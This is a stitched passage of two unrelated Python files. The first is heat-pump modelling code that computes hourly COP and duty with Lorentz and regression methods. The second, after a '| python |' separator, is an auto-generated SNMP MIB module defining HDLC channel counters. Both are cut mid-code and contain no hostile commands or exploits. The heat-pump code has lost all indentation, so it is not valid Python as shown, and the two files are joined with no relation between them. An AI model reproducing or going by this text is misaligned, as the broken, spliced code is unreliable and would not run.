inputs_basics['capacity'],
inputs_basics['ambient_delta_t'],
inputs_basics['minimum_runtime'],
inputs_basics['minimum_output'],
inputs_basics['data_input'],
inputs_demands['source_temp'],
inputs_demands['return_temp_DH'],
input_weather,
simple_cop=inputs_simple)
return myHeatPump.performance()
elif modelling_approach == 'Lorentz':
inputs_lorentz = myInputs.heatpump_lorentz()
inputs_demands = myInputs.demands()
myHeatPump = HeatPump(
inputs_basics['heat_pump_type'],
inputs_basics['modelling_approach'],
inputs_basics['capacity'],
inputs_basics['ambient_delta_t'],
inputs_basics['minimum_runtime'],
inputs_basics['minimum_output'],
inputs_basics['data_input'],
inputs_demands['source_temp'],
inputs_demands['return_temp_DH'],
input_weather,
lorentz_inputs=inputs_lorentz)
return myHeatPump.performance()
elif modelling_approach == 'Generic regression':
inputs_demands = myInputs.demands()
myHeatPump = HeatPump(
inputs_basics['heat_pump_type'],
inputs_basics['modelling_approach'],
inputs_basics['capacity'],
inputs_basics['ambient_delta_t'],
inputs_basics['minimum_runtime'],
inputs_basics['minimum_output'],
inputs_basics['data_input'],
inputs_demands['source_temp'],
inputs_demands['return_temp_DH'],
input_weather)
return myHeatPump.performance()
elif modelling_approach == 'Standard test regression':
inputs_standard_regression = myInputs.heatpump_standard_regression()
inputs_demands = myInputs.demands()
myHeatPump = HeatPump(
inputs_basics['heat_pump_type'],
inputs_basics['modelling_approach'],
inputs_basics['capacity'],
inputs_basics['ambient_delta_t'],
inputs_basics['minimum_runtime'],
inputs_basics['minimum_output'],
inputs_basics['data_input'],
inputs_demands['source_temp'],
inputs_demands['return_temp_DH'],
input_weather,
standard_test_regression_inputs=inputs_standard_regression)
return myHeatPump.performance()
class HeatPump(object):
def __init__(self, hp_type, modelling_approach,
capacity, ambient_delta_t,
minimum_runtime, minimum_output, data_input,
flow_temp_source, return_temp,
hp_ambient_temp,
simple_cop=None,
lorentz_inputs=None,
generic_regression_inputs=None,
standard_test_regression_inputs=None
):
"""heat pump class object
Arguments:
hp_type {string} -- type of heatpump, ASHP, WSHP, GSHP
modelling_approach {str} -- simple, lorentz,
generic, standard regression
capacity {float} -- thermal capacity of heat pump
ambient_delta_t {int} -- drop in ambient source temperature
from inlet to outlet
minimum_runtime {string} -- fixed or variable speed compressor
data_input {str} -- type of data input, peak or integrated
flow_temp {dataframe} -- required temperatures out of HP
return_temp {dataframe} -- inlet temp to HP
weather {dic} -- ambient conditions of heat source
Keyword Arguments: all these are for inputs, bar simple,
for different modelling approaches
simple_cop {float} -- only COP for simple (default: {None})
lorentz_inputs {dic} -- (default: {None})
generic_regression_inputs {dic} -- (default: {None})
standard_test_regression_inputs {dic} -- (default: {None})
"""
self.hp_type = hp_type
self.modelling_approach = modelling_approach
self.capacity = capacity
self.ambient_delta_t = ambient_delta_t
self.minimum_runtime = minimum_runtime
self.minimum_output = minimum_output
self.data_input = data_input
self.flow_temp_source = flow_temp_source
self.return_temp = return_temp
self.hp_ambient_temp = hp_ambient_temp
self.simple_cop = simple_cop
self.lorentz_inputs = lorentz_inputs
self.generic_regression_inputs = generic_regression_inputs
self.standard_test_regression_inputs = standard_test_regression_inputs
def heat_resource(self):
"""accessing the heat resource
takes the hp resource from the weather class
Returns:
dataframe -- ambient temperature for heat source of heat pump
"""
HP_resource = weather.Weather(
air_temperature=self.hp_ambient_temp['air_temperature'],
water_temperature=self.hp_ambient_temp['water_temperature']).heatpump()
if self.hp_type == 'ASHP':
HP_resource = HP_resource.rename(
columns={'air_temperature': 'ambient_temp'})
return HP_resource[['ambient_temp']]
elif self.hp_type == 'WSHP':
HP_resource = HP_resource.rename(
columns={'water_temperature': 'ambient_temp'})
return HP_resource[['ambient_temp']]
else:
print('ERROR invalid heat pump type')
def performance(self):
"""performance over year of heat pump
input a timestep from which gathers inputs
a method for calculating the heat pump performance (cop and duty)
for a timetsp
outputs are dict containing
Returns:
dic -- cop and duty for each hour timestep in year
"""
if self.capacity == 0:
performance = []
for timesteps in range(8760):
# cop needs to be low to not break the mpc solver
# duty being zero means it won't choose it anyway
p = {'cop': 0.5, 'duty': 0}
performance.append(p)
return performance
ambient_temp = self.heat_resource()['ambient_temp']
if self.modelling_approach == 'Simple':
cop_x = self.simple_cop
duty_x = self.capacity
elif self.modelling_approach == 'Lorentz':
myLorentz = Lorentz(self.lorentz_inputs['cop'],
self.lorentz_inputs['flow_temp_spec'],
self.lorentz_inputs['return_temp_spec'],
self.lorentz_inputs['temp_ambient_in_spec'],
self.lorentz_inputs['temp_ambient_out_spec'],
self.lorentz_inputs['elec_capacity'])
hp_eff = myLorentz.hp_eff()
elif self.modelling_approach == 'Generic regression':
myGenericRegression = GenericRegression()
duty_x = self.capacity
elif self.modelling_approach == 'Standard test regression':
myStandardRegression = StandardTestRegression(
self.standard_test_regression_inputs['data_x'],
self.standard_test_regression_inputs['data_COSP'],
self.standard_test_regression_inputs['data_duty'])
models = myStandardRegression.train()
COP_model = models['COP_model']
duty_model = models['duty_model']
performance = []
for timestep in range(8760):
if self.modelling_approach == 'Simple':
cop = cop_x
hp_duty = duty_x
elif self.modelling_approach == 'Lorentz':
ambient_return = ambient_temp[timestep] - self.ambient_delta_t
cop = myLorentz.calc_cop(hp_eff,
self.flow_temp_source[timestep],
self.return_temp[timestep],
ambient_temp[timestep],
ambient_return)
hp_duty = myLorentz.calc_duty(self.capacity)
elif self.modelling_approach == 'Generic regression':
if self.hp_type == 'ASHP':
cop = myGenericRegression.ASHP_cop(
self.flow_temp_source[timestep],
ambient_temp[timestep])
elif self.hp_type == 'GSHP' or self.hp_type == 'WSHP':
cop = myGenericRegression.GSHP_cop(
self.flow_temp_source[timestep],
ambient_temp[timestep])
# account for defrosting below 5 drg
if ambient_temp[timestep] <= 5:
cop = 0.9 * cop
hp_duty = duty_x
elif self.modelling_approach == 'Standard test regression':
hp_duty = myStandardRegression.predict_duty(
duty_model,
ambient_temp[timestep],
self.flow_temp_source[timestep])
# 15% reduction in performance if
# data not done to standards
if self.data_input == 'Integrated performance' or ambient_temp[timestep] > 5:
cop = myStandardRegression.predict_COP(
COP_model,
ambient_temp[timestep],
self.flow_temp_source[timestep])
elif self.data_input == 'Peak performance':
if self.hp_type == 'ASHP':
if ambient_temp[timestep] <= 5:
cop = 0.9 * myStandardRegression.predict_COP(
COP_model,
ambient_temp[timestep],
self.flow_temp_source[timestep])
d = {'cop': cop, 'duty': hp_duty}
performance.append(d)
return performance
def elec_usage(self, demand, hp_performance):
"""electricity usage of hp for timestep given a thermal demand
calculates the electrical usage of the heat pump given a heat demand
outputs a dataframe of heat demand, heat pump heat demand,
heat pump elec demand, cop, duty, and leftover
(only non-zero for fixed speed HP)
Arguments:
timestep {int} -- timestep to be calculated
demand {float} -- thermal demand to be met by heat pump
hp_performance {dic} -- dic containing the cop and duty
for timesteps over year
Returns:
dic -- heat demand to be met, cop, duty,
heat demand met by hp, electricity usage of heat pump
"""
if self.capacity == 0:
return {'hp_demand': 0.0, 'hp_elec': 0.0}
cop = hp_performance['cop']
duty = hp_performance['duty']
max_elec_usage = demand / cop
max_elec_cap = duty / cop
hp_elec = min(max_elec_usage, max_elec_cap)
hp_demand = hp_elec * cop
d = {'hp_demand': hp_demand,
'hp_elec': hp_elec}
return d
def thermal_output(self, elec_supply,
hp_performance, heat_demand):
"""thermal output from a given electricity supply
Arguments:
timestep {int} -- timestep to be modelled
elec_supply {float} -- electricity supply used by heat pump
hp_performance {dic} -- dic containing the cop and duty
for timesteps over year
heat_demand {float} -- heat demand to be met of timestep
Returns:
dic -- max_thermal_output, heat demand met by hp,
electricity usage of heat pump
"""
if self.capacity == 0:
return {'hp_demand': 0.0, 'hp_elec': 0.0}
cop = hp_performance['cop']
duty = hp_performance['duty']
# maximum thermal output given elec supply
max_thermal_output = elec_supply * cop
# demand met by hp is min of three arguments
hp_demand = min(max_thermal_output, heat_demand, duty)
hp_elec = hp_demand / cop
d = {'hp_demand': hp_demand,
'hp_elec': hp_elec}
return d
class Lorentz(object):
def __init__(self, cop, flow_temp_spec, return_temp_spec,
ambient_temp_in_spec, ambient_temp_out_spec,
elec_capacity):
"""lorentz calculations and attributes
based on EnergyPRO method
Arguments:
cop {float} -- cop at specified conditions
flow_temp_spec {float} -- temperature from HP spec
return_temp_spec {float} -- tempature to HP spec
ambient_temp_in_spec {float} -- specificed
ambient_temp_out_spec {float} -- spec
elec_capacity {float} -- absolute
"""
self.cop = cop
self.flow_temp_spec = flow_temp_spec
self.return_temp_spec = return_temp_spec
self.ambient_temp_in_spec = ambient_temp_in_spec
self.ambient_temp_out_spec = ambient_temp_out_spec
self.elec_capacity = elec_capacity
def hp_eff(self):
"""heat pump efficiency which is static
# calcultaions of the lorentz model. starting with the mean temps fo
# for the temp flow and return of heat pump, t high mean
# and the ambient in and out temps, t low mean
Returns:
float -- efficiency of the heat pump
"""
t_high_mean = ((self.flow_temp_spec - self.return_temp_spec) /
(math.log((self.flow_temp_spec + 273.15) /
(self.return_temp_spec + 273.15))))
t_low_mean = (
(self.ambient_temp_in_spec - self.ambient_temp_out_spec) /
(math.log((self.ambient_temp_in_spec + 273.15) /
(self.ambient_temp_out_spec + 273.15))))
# lorentz cop is the highest theoretical cop
cop_lorentz = t_high_mean / (t_high_mean - t_low_mean)
# this gives the heat pump efficiency using the stated cop
# the lorentz cop is calcualted for each timestep
# then this is multiplied by the heat pump
# efficiency to give actual cop
hp_eff = self.cop / cop_lorentz
return hp_eff
def calc_cop(self, hp_eff, flow_temp, return_temp,
ambient_temp_in, ambient_temp_out):
"""cop for timestep
calculates the cop based upon actual flow/retur and ambient
uses heat pump efficiency from before
Arguments:
hp_eff {float} -- heat pump efficiency
flow_temp {float} -- flow temperature from heat pump
return_temp {float} -- temperature returning to heat pump
ambient_temp_in {float} -- real-time
ambient_temp_out {float} -- real-time
Returns:
float -- cop for timestep
"""
t_high_mean = ((flow_temp - return_temp) /
(math.log((flow_temp + 273.15) /
(return_temp + 273.15))))
t_low_mean = ((ambient_temp_in - ambient_temp_out) /
(math.log((ambient_temp_in + 273.15) /
(ambient_temp_out + 273.15))))
cop_lorentz = t_high_mean / (t_high_mean - t_low_mean)
cop = hp_eff * cop_lorentz
return cop
def calc_duty(self, capacity):
"""duty for timestep
calculates duty for timestep, ensures this is not exceeded
Arguments:
capacity {float} -- electrical capacity of heat pump
Returns:
float -- duty is the thermal output of the heat pump
"""
duty_max = self.cop * self.elec_capacity
if duty_max >= capacity:
duty = capacity
elif duty_max < capacity:
duty = duty_max
return duty
class GenericRegression(object):
"""uses generic regression analysis to predict performance
see Staffel paper on review of domestic heat pumps for coefficients
"""
def ASHP_cop(self, flow_temp, ambient_temp):
cop = (6.81 -
0.121 * (flow_temp - ambient_temp) +
0.00063 * (flow_temp - ambient_temp) ** 2
)
return cop
def ASHP_duty(self, flow_temp, ambient_temp):
duty = (5.80 +
0.21 * (ambient_temp)
)
return duty
def GSHP_cop(self, flow_temp, ambient_temp):
cop = (8.77 -
0.15 * (flow_temp - ambient_temp) +
0.000734 * (flow_temp - ambient_temp) ** 2
)
return cop
def GSHP_duty(self, flow_temp, ambient_temp):
duty = (9.37 +
0.30 * ambient_temp
)
return duty
def plot_cop(self):
x_ambient = np.linspace(-5, 15, num=100)
cop_55 = []
for z in range(len(x_ambient)):
c = self.ASHP_cop(55, x_ambient[z])
if x_ambient[z] <= 5:
c = 0.9 * c
cop_55.append(c)
cop_45 = []
for z in range(len(x_ambient)):
c = self.ASHP_cop(45, x_ambient[z])
if x_ambient[z] <= 5:
c = 0.9 * c
cop_45.append(c)
plt.plot(x_ambient, cop_45, LineWidth=2)
plt.plot(x_ambient, cop_55, LineWidth=2)
plt.legend(['Flow T 45', 'FLow T 55'], loc='best')
plt.ylabel('COP')
plt.xlabel('Ambient temperature')
plt.show()
class StandardTestRegression(object):
def __init__(self, data_x, data_COSP,
data_duty, degree=2):
"""regression analysis based on standard test condition data
trains a model
predicts cop and duty
Arguments:
data_x {dataframe} -- with flow temps and ambient temps
data_COSP {dataframe} -- with cosp data for different data_X
data_duty {dataframe} -- with duty data for different data_X
Keyword Arguments:
degree {number} -- polynomial number (default: {2})
"""
self.data_x = data_x
self.data_COSP = data_COSP
self.data_duty = data_duty
self.degree = degree
def train(self):
"""training model
"""
poly = PolynomialFeatures(degree=self.degree, include_bias=False)
X_new = poly.fit_transform(self.data_x)
Y_COSP_new = poly.fit_transform(self.data_COSP)
Y_duty_new = poly.fit_transform(self.data_duty)
model_cop = LinearRegression()
model_cop.fit(X_new, Y_COSP_new)
model_duty = LinearRegression()
model_duty.fit(X_new, Y_duty_new)
return {'COP_model': model_cop, 'duty_model': model_duty}
def predict_COP(self, model, ambient_temp, flow_temp):
"""predicts COP from model
Arguments:
model {dic} -- cop and duty models in dic
ambient_temp {float} --
flow_temp {float} --
Returns:
float -- predicted COP
"""
x_pred = np.array([ambient_temp, flow_temp]).reshape(1, -1)
poly = PolynomialFeatures(degree=2, include_bias=False)
x_pred_new = poly.fit_transform(x_pred)
pred_cop = model.predict(x_pred_new)
return float(pred_cop[:, 0])
def predict_duty(self, model, ambient_temp, flow_temp):
"""predicts duty from regression model
Arguments:
model {dic} -- cop and duty models in dic
ambient_temp {float} --
flow_temp {float} --
Returns:
float -- predicted COP
"""
x_pred = np.array([ambient_temp, flow_temp]).reshape(1, -1)
poly = PolynomialFeatures(degree=2, include_bias=False)
x_pred_new = poly.fit_transform(x_pred)
pred_duty = model.predict(x_pred_new)
return float(pred_duty[:, 0])
def graphs(self):
"""OLD testing of how to do regression analysis
includes input method, regression, graphing
"""
path = t.inputs_path()
file1 = os.path.join(path['folder_path'], "regression1.pkl")
regression1 = pd.read_pickle(file1)
path = t.inputs_path()
file1a = os.path.join(path['folder_path'], "regression_temp1.pkl")
regression_temp1 = pd.read_pickle(file1a)
dic = {'flow_temp': [regression_temp1['flow_temp'][0],
regression_temp1['flow_temp'][0],
regression_temp1['flow_temp'][0],
regression_temp1['flow_temp'][0],
regression_temp1['flow_temp'][0],
regression_temp1['flow_temp'][0],
regression_temp1['flow_temp'][0],
regression_temp1['flow_temp'][0]]}
df = pd.DataFrame(data=dic)
data1 = pd.concat([regression1, df], axis=1)
path = t.inputs_path()
file2 = os.path.join(path['folder_path'], "regression2.pkl")
regression2 = pd.read_pickle(file2)
path = t.inputs_path()
file2a = os.path.join(path['folder_path'], "regression_temp2.pkl")
regression_temp2 = pd.read_pickle(file2a)
dic2 ={'flow_temp': [regression_temp2['flow_temp'][0],
regression_temp2['flow_temp'][0],
regression_temp2['flow_temp'][0],
regression_temp2['flow_temp'][0],
regression_temp2['flow_temp'][0],
regression_temp2['flow_temp'][0],
regression_temp2['flow_temp'][0],
regression_temp2['flow_temp'][0]]}
df2 = pd.DataFrame(data=dic2)
data2 = pd.concat([regression2, df2], axis=1)
path = t.inputs_path()
file3 = os.path.join(path['folder_path'], "regression3.pkl")
regression3 = pd.read_pickle(file3)
path = t.inputs_path()
file3a = os.path.join(path['folder_path'], "regression_temp3.pkl")
regression_temp3 = pd.read_pickle(file3a)
dic3 ={'flow_temp': [regression_temp3['flow_temp'][0],
regression_temp3['flow_temp'][0],
regression_temp3['flow_temp'][0],
regression_temp3['flow_temp'][0],
regression_temp3['flow_temp'][0],
regression_temp3['flow_temp'][0],
regression_temp3['flow_temp'][0],
regression_temp3['flow_temp'][0]]}
df3 = pd.DataFrame(data=dic3)
data3 = pd.concat([regression3, df3], axis=1)
path = t.inputs_path()
file4 = os.path.join(path['folder_path'], "regression4.pkl")
regression4 = pd.read_pickle(file4)
path = t.inputs_path()
file4a = os.path.join(path['folder_path'], "regression_temp4.pkl")
regression_temp4 = pd.read_pickle(file4a)
dic4 ={'flow_temp': [regression_temp4['flow_temp'][0],
regression_temp4['flow_temp'][0],
regression_temp4['flow_temp'][0],
regression_temp4['flow_temp'][0],
regression_temp4['flow_temp'][0],
regression_temp4['flow_temp'][0],
regression_temp4['flow_temp'][0],
regression_temp4['flow_temp'][0]]}
df4 = pd.DataFrame(data=dic4)
data4 = pd.concat([regression4, df4], axis=1)
regression_data = data1.append([data2, data3, data4])
regression_data = regression_data.dropna()
regression_data = regression_data.reset_index(drop=True)
#note that ambient temp is column1 and flow_temp is column 2
X = regression_data.drop(columns=['duty', 'capacity_percentage', 'COSP'])
Y_COSP = regression_data.drop(columns=['duty', 'capacity_percentage', 'flow_temp', 'ambient_temp'])
Y_duty = regression_data.drop(columns=['COSP', 'capacity_percentage', 'flow_temp', 'ambient_temp'])
poly = PolynomialFeatures(degree=2, include_bias=False)
X_new = poly.fit_transform(X)
Y_COSP_new = poly.fit_transform(Y_COSP)
model_cop = LinearRegression()
model_cop.fit(X_new, Y_COSP_new)
model_duty = LinearRegression()
model_duty.fit(X_new, Y_duty)
x_ambient = np.linspace(-20,20,num=100)
df1 = pd.DataFrame(data=x_ambient)
x_flow_temp = np.array([50, 55, 60, 65, 70, 75, 80])
df2 = pd.DataFrame(data=x_flow_temp)
f_t = []
am = []
for x in range(0, len(x_flow_temp)):
for y in range(0, len(x_ambient)):
f_t.append(x_flow_temp[x])
am.append(x_ambient[y])
df3 = pd.DataFrame(data=f_t)
df3 = df3.rename(columns= {0:'flow_temp'})
df4 = pd.DataFrame(data=am)
df4 = df4.rename(columns= {0:'ambient_temp'})
x_test = pd.concat([df4, df3], axis=1)
x_test_new = poly.fit_transform(x_test)
pred_cop = model_cop.predict(x_test_new)
pred_duty = model_duty.predict(x_test_new)
fileout = os.path.join(os.path.dirname(__file__), '..', 'outputs', 'heatpump', 'regression_analysis.pdf')
pp = PdfPages(fileout)
dfs = []
for x in range(0, len(df2)):
y1 = x * len(df1)
y2 = (x+1) * len(df1)
dfs.append(pred_cop[y1:y2])
fig, ax = plt.subplots()
for x in range(0, len(df2)):
ax.plot(df1, dfs[x][:,0], label = df2[0][x])
ax.legend(title = 'Flow temperatures')
ax.scatter(X['ambient_temp'], Y_COSP['COSP'])
plt.xlabel('Ambient temp')
plt.ylabel('COSP')
pp.savefig(bbox_inches='tight')
dfs2 = []
for x in range(0, len(df2)):
y1 = x * len(df1)
y2 = (x+1) * len(df1)
dfs2.append(pred_duty[y1:y2])
fig, ax = plt.subplots()
for x in range(0, len(df2)):
ax.plot(df1, dfs2[x][:,0], label = df2[0][x])
ax.legend(title = 'Flow temperatures')
ax.scatter(X['ambient_temp'], Y_duty['duty'])
plt.xlabel('Ambient temp')
plt.ylabel('duty (kW)')
pp.savefig(bbox_inches='tight')
pp.close()
return
| python |
#
# PySNMP MIB module APTIS-HDLC-MIB (http://snmplabs.com/pysmi)
# ASN.1 source file:///Users/davwang4/Dev/mibs.snmplabs.com/asn1/APTIS-HDLC-MIB
# Produced by pysmi-0.3.4 at Wed May 1 11:24:33 2019
# On host DAVWANG4-M-1475 platform Darwin version 18.5.0 by user davwang4
# Using Python version 3.7.3 (default, Mar 27 2019, 09:23:15)
#
aptis_generic, = mibBuilder.importSymbols("APTIS-MIB", "aptis-generic")
OctetString, ObjectIdentifier, Integer = mibBuilder.importSymbols("ASN1", "OctetString", "ObjectIdentifier", "Integer")
NamedValues, = mibBuilder.importSymbols("ASN1-ENUMERATION", "NamedValues")
ValueSizeConstraint, ConstraintsUnion, ConstraintsIntersection, ValueRangeConstraint, SingleValueConstraint = mibBuilder.importSymbols("ASN1-REFINEMENT", "ValueSizeConstraint", "ConstraintsUnion", "ConstraintsIntersection", "ValueRangeConstraint", "SingleValueConstraint")
NotificationGroup, ModuleCompliance = mibBuilder.importSymbols("SNMPv2-CONF", "NotificationGroup", "ModuleCompliance")
ObjectIdentity, Gauge32, iso, Counter64, ModuleIdentity, IpAddress, MibIdentifier, TimeTicks, Integer32, MibScalar, MibTable, MibTableRow, MibTableColumn, Unsigned32, Counter32, Bits, NotificationType = mibBuilder.importSymbols("SNMPv2-SMI", "ObjectIdentity", "Gauge32", "iso", "Counter64", "ModuleIdentity", "IpAddress", "MibIdentifier", "TimeTicks", "Integer32", "MibScalar", "MibTable", "MibTableRow", "MibTableColumn", "Unsigned32", "Counter32", "Bits", "NotificationType")
DisplayString, TextualConvention = mibBuilder.importSymbols("SNMPv2-TC", "DisplayString", "TextualConvention")
aptisHdlc = MibIdentifier((1, 3, 6, 1, 4, 1, 2637, 2, 7))
class Index(Integer32):
pass
aptisHdlcTable = MibTable((1, 3, 6, 1, 4, 1, 2637, 2, 7, 1), )
if mibBuilder.loadTexts: aptisHdlcTable.setStatus('mandatory')
if mibBuilder.loadTexts: aptisHdlcTable.setDescription('These parameters represent statistics for all of the HDLC channels for a single HDLC chip. These are errors that cannot be specified on a specific HDLC channel.')
aptisHdlcEntry = MibTableRow((1, 3, 6, 1, 4, 1, 2637, 2, 7, 1, 1), ).setIndexNames((0, "APTIS-HDLC-MIB", "aptisHdlcIfIndex"))
if mibBuilder.loadTexts: aptisHdlcEntry.setStatus('mandatory')
if mibBuilder.loadTexts: aptisHdlcEntry.setDescription('The Parameters for the all of the HDLC connections for a specific HDLC chip.')
aptisHdlcIfIndex = MibTableColumn((1, 3, 6, 1, 4, 1, 2637, 2, 7, 1, 1, 1), Index()).setMaxAccess("readonly")
if mibBuilder.loadTexts: aptisHdlcIfIndex.setStatus('mandatory')
if mibBuilder.loadTexts: aptisHdlcIfIndex.setDescription('The ifIndex value of the corresponding ifEntry.')
aptisHdlcReceiveDrops = MibTableColumn((1, 3, 6, 1, 4, 1, 2637, 2, 7, 1, 1, 2), Counter32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: aptisHdlcReceiveDrops.setStatus('mandatory')
if mibBuilder.loadTexts: aptisHdlcReceiveDrops.setDescription('Number of HDLC frames received that were dropped.')
aptisHdlcTransmitDrops = MibTableColumn((1, 3, 6, 1, 4, 1, 2637, 2, 7, 1, 1, 3), Counter32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: aptisHdlcTransmitDrops.setStatus('mandatory')
if mibBuilder.loadTexts: aptisHdlcTransmitDrops.setDescription('Number of HDLC frames to be transmitted that were dropped.')
aptisHdlcSysErrors = MibTableColumn((1, 3, 6, 1, 4, 1, 2637, 2, 7, 1, 1, 4), Counter32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: aptisHdlcSysErrors.setStatus('mandatory')
if mibBuilder.loadTexts: aptisHdlcSysErrors.setDescription('Number of HDLC system errors.')
aptisHdlcParityErrors = MibTableColumn((1, 3, 6, 1, 4, 1, 2637, 2, 7, 1, 1, 5), Counter32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: aptisHdlcParityErrors.setStatus('mandatory')
if mibBuilder.loadTexts: aptisHdlcParityErrors.setDescription('Number of HDLC parity errors.')
aptisHdlcFCSErrors = MibTableColumn((1, 3, 6, 1, 4, 1, 2637, 2, 7, 1, 1, 6), Counter32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: aptisHdlcFCSErrors.setStatus('mandatory')
if mibBuilder.loadTexts: aptisHdlcFCSErrors.setDescription('Number of HDLC Frame CheckSum errors.')
aptisHdlcAborts = MibTableColumn((1, 3, 6, 1, 4, 1, 2637, 2, 7, 1, 1, 7), Counter32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: aptisHdlcAborts.setStatus('mandatory')
if mibBuilder.loadTexts: aptisHdlcAborts.setDescription('Number of HDLC aborts.')
aptisHdlcFramingErrors = MibTableColumn((1, 3, 6, 1, 4, 1, 2637, 2, 7, 1, 1, 8), Counter32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: aptisHdlcFramingErrors.setStatus('mandatory')
if mibBuilder.loadTexts: aptisHdlcFramingErrors.setDescription('Number of HDLC framing errors.')
aptisHdlcReceiveOverruns = MibTableColumn((1, 3, 6, 1, 4, 1, 2637, 2, 7, 1, 1, 9), Counter32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: aptisHdlcReceiveOverruns.setStatus('mandatory')
if mibBuilder.loadTexts: aptisHdlcReceiveOverruns.setDescription('Number of HDLC receive overruns.')
aptisHdlcTransmitUnderflows = MibTableColumn((1, 3, 6, 1, 4, 1, 2637, 2, 7, 1, 1, 10), Counter32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: aptisHdlcTransmitUnderflows.setStatus('mandatory')
if mibBuilder.loadTexts: aptisHdlcTransmitUnderflows.setDescription('Number of HDLC transmit underflows.')
aptisHdlcChannelTable = MibTable((1, 3, 6, 1, 4, 1, 2637, 2, 7, 2), )
if mibBuilder.loadTexts: aptisHdlcChannelTable.setStatus('mandatory')
if mibBuilder.loadTexts: aptisHdlcChannelTable.setDescription('These parameters represent statistics for all of the HDLC channels for a single HDLC chip. These are errors that cannot be specified on a specific HDLC channel.')
aptisHdlcChannelEntry = MibTableRow((1, 3, 6, 1, 4, 1, 2637, 2, 7, 2, 1), ).setIndexNames((0, "APTIS-HDLC-MIB", "aptisHdlcIfIndex"), (0, "APTIS-HDLC-MIB", "aptisHdlcChannelIfIndex"))
if mibBuilder.loadTexts: aptisHdlcChannelEntry.setStatus('mandatory')
if mibBuilder.loadTexts: aptisHdlcChannelEntry.setDescription('The Parameters for the all of the HDLC connections for a specific HDLC chip.')
aptisHdlcChannelIfIndex = MibTableColumn((1, 3, 6, 1, 4, 1, 2637, 2, 7, 2, 1, 1), Index()).setMaxAccess("readonly")
if mibBuilder.loadTexts: aptisHdlcChannelIfIndex.setStatus('mandatory')
if mibBuilder.loadTexts: aptisHdlcChannelIfIndex.setDescription('HDLC channel interface index.')
aptisHdlcChannelStatus = MibTableColumn((1, 3, 6, 1, 4, 1, 2637, 2, 7, 2, 1, 2), Integer32().subtype(subtypeSpec=ConstraintsUnion(SingleValueConstraint(1, 2, 3, 4, 5, 6))).clone(namedValues=NamedValues(("init", 1), ("down", 2), ("disabled", 3), ("smconnnectwait", 4), ("up", 5), ("smdisconnectwait", 6)))).setMaxAccess("readonly")
if mibBuilder.loadTexts: aptisHdlcChannelStatus.setStatus('mandatory')
if mibBuilder.loadTexts: aptisHdlcChannelStatus.setDescription('This indicates the status of the HDLC Channel.')
aptisHdlcChannelRcvFrames = MibTableColumn((1, 3, 6, 1, 4, 1, 2637, 2, 7, 2, 1, 3), Counter32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: aptisHdlcChannelRcvFrames.setStatus('mandatory')
if mibBuilder.loadTexts: aptisHdlcChannelRcvFrames.setDescription('Number of frames received on the HDLC channel.')
aptisHdlcChannelRcvOctets = MibTableColumn((1, 3, 6, 1, 4, 1, 2637, 2, 7, 2, 1, 4), Counter32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: aptisHdlcChannelRcvOctets.setStatus('mandatory')
if mibBuilder.loadTexts: aptisHdlcChannelRcvOctets.setDescription('Number of octets received on the HDLC channel.')
aptisHdlcChannelRcvDrops = MibTableColumn((1, 3, 6, 1, 4, 1, 2637, 2, 7, 2, 1, 5), Counter32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: aptisHdlcChannelRcvDrops.setStatus('mandatory')
if mibBuilder.loadTexts: aptisHdlcChannelRcvDrops.setDescription('Number of frames received on the HDLC channel that were dropped.')
aptisHdlcChannelRcvMaxPacket = MibTableColumn((1, 3, 6, 1, 4, 1, 2637, 2, 7, 2, 1, 6), Counter32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: aptisHdlcChannelRcvMaxPacket.setStatus('mandatory')
if mibBuilder.loadTexts: aptisHdlcChannelRcvMaxPacket.setDescription('Maximum receive packet size on the HDLC channel.')
aptisHdlcChannelRcvOverruns = MibTableColumn((1, 3, 6, 1, 4, 1, 2637, 2, 7, 2, 1, 7), Counter32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: aptisHdlcChannelRcvOverruns.setStatus('mandatory')
if mibBuilder.loadTexts: aptisHdlcChannelRcvOverruns.setDescription('Number of frames received on the HDLC channel with overrun errors.')
aptisHdlcChannelRcvFCSErrors = MibTableColumn((1, 3, 6, 1, 4, 1, 2637, 2, 7, 2, 1, 8), Counter32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: aptisHdlcChannelRcvFCSErrors.setStatus('mandatory')
if mibBuilder.loadTexts: aptisHdlcChannelRcvFCSErrors.setDescription('Number of frames received on the HDLC channel with frame checksum errors.')
aptisHdlcChannelRcvByteAlign = MibTableColumn((1, 3, 6, 1, 4, 1, 2637, 2, 7, 2, 1, 9), Counter32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: aptisHdlcChannelRcvByteAlign.setStatus('mandatory')
if mibBuilder.loadTexts: aptisHdlcChannelRcvByteAlign.setDescription('Number of frames received on the HDLC channel with byte alignment errors.')
aptisHdlcChannelRcvAborts = MibTableColumn((1, 3, 6, 1, 4, 1, 2637, 2, 7, 2, 1, 10), Counter32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: aptisHdlcChannelRcvAborts.setStatus('mandatory')
if mibBuilder.loadTexts: aptisHdlcChannelRcvAborts.setDescription('Number of receive attempts on the HDLC channel that were aborted.')
aptisHdlcChannelTransmitFrames = MibTableColumn((1, 3, 6, 1, 4, 1, 2637, 2, 7, 2, 1, 11), Counter32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: aptisHdlcChannelTransmitFrames.setStatus('mandatory')
if mibBuilder.loadTexts: aptisHdlcChannelTransmitFrames.setDescription('Number of frames transmitted on the HDLC channel.')
aptisHdlcChannelTransmitOctets = MibTableColumn((1, 3, 6, 1, 4, 1, 2637, 2, 7, 2, 1, 12), Counter32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: aptisHdlcChannelTransmitOctets.setStatus('mandatory')
if mibBuilder.loadTexts: aptisHdlcChannelTransmitOctets.setDescription('Number of octets transmitted on the HDLC channel.')
aptisHdlcChannelTransmitDrops = MibTableColumn((1, 3, 6, 1, 4, 1, 2637, 2, 7, 2, 1, 13), Counter32()).setMaxAccess("readonly")
